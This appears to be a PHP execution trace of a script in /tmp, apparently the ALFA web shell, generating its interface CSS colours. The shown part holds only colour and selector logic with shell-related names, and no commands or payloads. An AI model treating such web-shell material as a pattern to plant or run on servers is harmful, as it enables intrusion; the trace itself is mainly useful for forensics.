6	133	0	0.006519	435856	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'shell_border'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#0E304A', 'multi_selector' => ['.header' => 'border: 7px solid {color}', '#meunlist' => 'border-color: {color}', '#hidden_sh' => 'background-color: {color}', '.ajaxarea' => 'border: 1px solid {color}', '.foot' => 'border-color: {color}']]
6	133	1	0.006554	435856
6	133	R			'#0E304A'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#0E304A'
6	134	0	0.006579	435856	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#0E304A'	'border-color: {color}'
6	134	1	0.006595	436000
6	134	R			'border-color: #0E304A'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'border-color: #0E304A'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '#meunlist{border-color: #0E304A}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '#hidden_sh'
6	135	0	0.006646	435880	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'shell_border'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#0E304A', 'multi_selector' => ['.header' => 'border: 7px solid {color}', '#meunlist' => 'border-color: {color}', '#hidden_sh' => 'background-color: {color}', '.ajaxarea' => 'border: 1px solid {color}', '.foot' => 'border-color: {color}']]
6	135	1	0.006680	435880
6	135	R			'#0E304A'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#0E304A'
6	136	0	0.006704	435880	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#0E304A'	'background-color: {color}'
6	136	1	0.006721	436032
6	136	R			'background-color: #0E304A'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'background-color: #0E304A'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '#hidden_sh{background-color: #0E304A}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.ajaxarea'
6	137	0	0.006773	435920	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'shell_border'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#0E304A', 'multi_selector' => ['.header' => 'border: 7px solid {color}', '#meunlist' => 'border-color: {color}', '#hidden_sh' => 'background-color: {color}', '.ajaxarea' => 'border: 1px solid {color}', '.foot' => 'border-color: {color}']]
6	137	1	0.006807	435920
6	137	R			'#0E304A'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#0E304A'
6	138	0	0.006832	435920	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#0E304A'	'border: 1px solid {color}'
6	138	1	0.006848	436072
6	138	R			'border: 1px solid #0E304A'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'border: 1px solid #0E304A'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.ajaxarea{border: 1px solid #0E304A}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.foot'
6	139	0	0.006904	435984	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'shell_border'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#0E304A', 'multi_selector' => ['.header' => 'border: 7px solid {color}', '#meunlist' => 'border-color: {color}', '#hidden_sh' => 'background-color: {color}', '.ajaxarea' => 'border: 1px solid {color}', '.foot' => 'border-color: {color}']]
6	139	1	0.006938	435984
6	139	R			'#0E304A'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#0E304A'
6	140	0	0.006963	435984	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#0E304A'	'border-color: {color}'
6	140	1	0.006978	436128
6	140	R			'border-color: #0E304A'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'border-color: #0E304A'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.foot{border-color: #0E304A}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'header_vars'
6	141	0	0.007028	435976	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	1	'header_vars'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = '#27979B'
6	141	1	0.007053	435976
6	141	R			'#27979B'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	$value = '#27979B'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	631	$css .= '.header_vars{color: #27979B;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'header_values'
6	142	0	0.007101	436008	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	1	'header_values'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = '#67ABDF'
6	142	1	0.007125	436008
6	142	R			'#67ABDF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	$value = '#67ABDF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	631	$css .= '.header_values{color: #67ABDF;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'header_on'
6	143	0	0.007173	436040	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	1	'header_on'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = '#00FF00'
6	143	1	0.007198	436040
6	143	R			'#00FF00'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	$value = '#00FF00'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	631	$css .= '.header_on{color: #00FF00;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'header_off'
6	144	0	0.007244	436104	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	1	'header_off'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = '#ff0000'
6	144	1	0.007268	436104
6	144	R			'#ff0000'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	$value = '#ff0000'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	631	$css .= '.header_off{color: #ff0000;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'header_none'
6	145	0	0.007315	436104	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	1	'header_none'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = '#00FF00'
6	145	1	0.007339	436104
6	145	R			'#00FF00'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	$value = '#00FF00'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	631	$css .= '.header_none{color: #00FF00;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'home_shell'
6	146	0	0.007385	436168	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	1	'home_shell'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = '#ff0000'
6	146	1	0.007409	436168
6	146	R			'#ff0000'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	$value = '#ff0000'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	631	$css .= '.home_shell{color: #ff0000;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'home_shell:hover'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.home_shell:hover'
6	147	0	0.007471	436168	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'home_shell:hover'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#FFFFFF', 'multi_selector' => ['.home_shell:hover' => 'color: {color};']]
6	147	1	0.007502	436168
6	147	R			'#FFFFFF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#FFFFFF'
6	148	0	0.007526	436168	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#FFFFFF'	'color: {color};'
6	148	1	0.007542	436304
6	148	R			'color: #FFFFFF;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'color: #FFFFFF;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.home_shell:hover{color: #FFFFFF;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'back_shell'
6	149	0	0.007590	436224	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	1	'back_shell'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = '#efbe73'
6	149	1	0.007614	436224
6	149	R			'#efbe73'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	$value = '#efbe73'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	631	$css .= '.back_shell{color: #efbe73;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'back_shell:hover'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.back_shell:hover'
6	150	0	0.007671	436224	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'back_shell:hover'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#FFFFFF', 'multi_selector' => ['.back_shell:hover' => 'color: {color};']]
6	150	1	0.007702	436224
6	150	R			'#FFFFFF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#FFFFFF'
6	151	0	0.007726	436224	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#FFFFFF'	'color: {color};'
6	151	1	0.007742	436360
6	151	R			'color: #FFFFFF;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'color: #FFFFFF;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.back_shell:hover{color: #FFFFFF;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'header_pwd'
6	152	0	0.007790	436288	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	1	'header_pwd'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = '#00FF00'
6	152	1	0.007814	436288
6	152	R			'#00FF00'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	$value = '#00FF00'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	631	$css .= '.header_pwd{color: #00FF00;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'header_pwd:hover'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.header_pwd:hover'
6	153	0	0.007872	436288	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'header_pwd:hover'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#FFFFFF', 'multi_selector' => ['.header_pwd:hover' => 'color: {color};']]
6	153	1	0.007903	436288
6	153	R			'#FFFFFF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#FFFFFF'
6	154	0	0.007927	436288	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#FFFFFF'	'color: {color};'
6	154	1	0.007943	436424
6	154	R			'color: #FFFFFF;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'color: #FFFFFF;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.header_pwd:hover{color: #FFFFFF;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'header_drive'
6	155	0	0.007991	436416	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	1	'header_drive'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = '#00FF00'
6	155	1	0.008020	436416
6	155	R			'#00FF00'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	$value = '#00FF00'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	631	$css .= '.header_drive{color: #00FF00;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'header_drive:hover'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.header_drive:hover'
6	156	0	0.008078	436416	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'header_drive:hover'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#FFFFFF', 'multi_selector' => ['.header_drive:hover' => 'color: {color};']]
6	156	1	0.008109	436416
6	156	R			'#FFFFFF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#FFFFFF'
6	157	0	0.008133	436416	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#FFFFFF'	'color: {color};'
6	157	1	0.008148	436552
6	157	R			'color: #FFFFFF;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'color: #FFFFFF;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.header_drive:hover{color: #FFFFFF;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'header_show_all'
6	158	0	0.008197	436416	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	1	'header_show_all'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = '#00FF00'
6	158	1	0.008221	436416
6	158	R			'#00FF00'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	$value = '#00FF00'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	631	$css .= '.header_show_all{color: #00FF00;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'disable_functions'
6	159	0	0.008268	436416	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	1	'disable_functions'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = '#ff0000'
6	159	1	0.008293	436416
6	159	R			'#ff0000'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	$value = '#ff0000'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	631	$css .= '.disable_functions{color: #ff0000;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'footer_text'
6	160	0	0.008341	436544	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	1	'footer_text'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = '#27979B'
6	160	1	0.008365	436544
6	160	R			'#27979B'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	$value = '#27979B'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	631	$css .= '.footer_text{color: #27979B;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'menu_options'
6	161	0	0.008412	436544	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	1	'menu_options'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = '#27979B'
6	161	1	0.008435	436544
6	161	R			'#27979B'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	$value = '#27979B'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	631	$css .= '.menu_options{color: #27979B;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'menu_options:hover'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.menu_options:hover'
6	162	0	0.008493	436544	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'menu_options:hover'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#646464', 'multi_selector' => ['.menu_options:hover' => 'background-color: {color};font-weight: unset;']]
6	162	1	0.008525	436544
6	162	R			'#646464'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#646464'
6	163	0	0.008550	436544	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#646464'	'background-color: {color};font-weight: unset;'
6	163	1	0.008570	436720
6	163	R			'background-color: #646464;font-weight: unset;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'background-color: #646464;font-weight: unset;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.menu_options:hover{background-color: #646464;font-weight: unset;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'options_list'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.content_options_holder .header center a'
6	164	0	0.008640	436712	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'options_list'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#00FF00', 'multi_selector' => ['.content_options_holder .header center a' => 'color: {color};']]
6	164	1	0.008671	436712
6	164	R			'#00FF00'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#00FF00'
6	165	0	0.008696	436712	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#00FF00'	'color: {color};'
6	165	1	0.008711	436848
6	165	R			'color: #00FF00;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'color: #00FF00;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.content_options_holder .header center a{color: #00FF00;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'options_list:hover'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.content_options_holder .header center a:hover'
6	166	0	0.008776	436672	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'options_list:hover'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#FFFFFF', 'multi_selector' => ['.content_options_holder .header center a:hover' => 'color: {color};']]
6	166	1	0.008807	436672
6	166	R			'#FFFFFF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#FFFFFF'
6	167	0	0.008831	436672	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#FFFFFF'	'color: {color};'
6	167	1	0.008847	436808
6	167	R			'color: #FFFFFF;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'color: #FFFFFF;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.content_options_holder .header center a:hover{color: #FFFFFF;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'options_list_header'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.txtfont_header'
6	168	0	0.008909	436800	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'options_list_header'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#59cc33', 'multi_selector' => ['.txtfont_header' => 'color: {color};']]
6	168	1	0.008939	436800
6	168	R			'#59cc33'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#59cc33'
6	169	0	0.008963	436800	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#59cc33'	'color: {color};'
6	169	1	0.008978	436936
6	169	R			'color: #59cc33;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'color: #59cc33;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.txtfont_header{color: #59cc33;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'options_list_text'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.txtfont,.tbltxt'
6	170	0	0.009039	436800	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'options_list_text'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#FFFFFF', 'multi_selector' => ['.txtfont,.tbltxt' => 'color: {color};']]
6	170	1	0.009070	436800
6	170	R			'#FFFFFF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#FFFFFF'
6	171	0	0.009094	436800	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#FFFFFF'	'color: {color};'
6	171	1	0.009110	436936
6	171	R			'color: #FFFFFF;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'color: #FFFFFF;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.txtfont,.tbltxt{color: #FFFFFF;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'Alfa+'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.alfa_plus'
6	172	0	0.009173	436800	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'Alfa+'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#06ff0f', 'multi_selector' => ['.alfa_plus' => 'color: {color};font-weight: unset;']]
6	172	1	0.009205	436800
6	172	R			'#06ff0f'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#06ff0f'
6	173	0	0.009229	436800	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#06ff0f'	'color: {color};font-weight: unset;'
6	173	1	0.009246	436960
6	173	R			'color: #06ff0f;font-weight: unset;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'color: #06ff0f;font-weight: unset;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.alfa_plus{color: #06ff0f;font-weight: unset;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'hidden_shell_text'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '#hidden_sh a'
6	174	0	0.009311	436824	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'hidden_shell_text'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#00FF00', 'multi_selector' => ['#hidden_sh a' => 'color: {color};']]
6	174	1	0.009342	436824
6	174	R			'#00FF00'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#00FF00'
6	175	0	0.009367	436824	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#00FF00'	'color: {color};'
6	175	1	0.009382	436960
6	175	R			'color: #00FF00;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'color: #00FF00;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '#hidden_sh a{color: #00FF00;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'hidden_shell_version'
6	176	0	0.009433	437056	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	1	'hidden_shell_version'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = '#ff0000'
6	176	1	0.009457	437056
6	176	R			'#ff0000'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	$value = '#ff0000'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	631	$css .= '.hidden_shell_version{color: #ff0000;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'shell_name'
6	177	0	0.009505	437056	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	1	'shell_name'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = '#FF0000'
6	177	1	0.009530	437056
6	177	R			'#FF0000'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	$value = '#FF0000'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	631	$css .= '.shell_name{color: #FF0000;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'main_row:hover'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.main tr:hover'
6	178	0	0.009588	437056	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'main_row:hover'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#646464', 'multi_selector' => ['.main tr:hover' => 'background-color: {color};']]
6	178	1	0.009620	437056
6	178	R			'#646464'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#646464'
6	179	0	0.009645	437056	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#646464'	'background-color: {color};'
6	179	1	0.009661	437208
6	179	R			'background-color: #646464;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'background-color: #646464;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.main tr:hover{background-color: #646464;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'main_header'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.main th'
6	180	0	0.009737	437072	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'main_header'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#FFFFFF', 'multi_selector' => ['.main th' => 'color: {color};']]
6	180	1	0.009768	437072
6	180	R			'#FFFFFF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#FFFFFF'
6	181	0	0.009792	437072	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#FFFFFF'	'color: {color};'
6	181	1	0.009808	437208
6	181	R			'color: #FFFFFF;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'color: #FFFFFF;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.main th{color: #FFFFFF;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'main_name'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	634	$k = '.main .main_name'
6	182	0	0.009868	437056	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	1	'main_name'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = ['key_color' => '#FFFFFF', 'multi_selector' => ['.main .main_name' => 'color: {color};font-weight: unset;']]
6	182	1	0.009899	437056
6	182	R			'#FFFFFF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	635	$color = '#FFFFFF'
6	183	0	0.009924	437056	str_replace	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	3	'{color}'	'#FFFFFF'	'color: {color};font-weight: unset;'
6	183	1	0.009941	437216
6	183	R			'color: #FFFFFF;font-weight: unset;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	636	$code = 'color: #FFFFFF;font-weight: unset;'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	637	$css .= '.main .main_name{color: #FFFFFF;font-weight: unset;}'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	628	$key = 'main_size'
6	184	0	0.009994	437080	alfa_getColor	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	1	'main_size'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	618	$target = '#67ABDF'
6	184	1	0.010018	437080
6	184	R			'#67ABDF'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	630	$value = '#67ABDF'
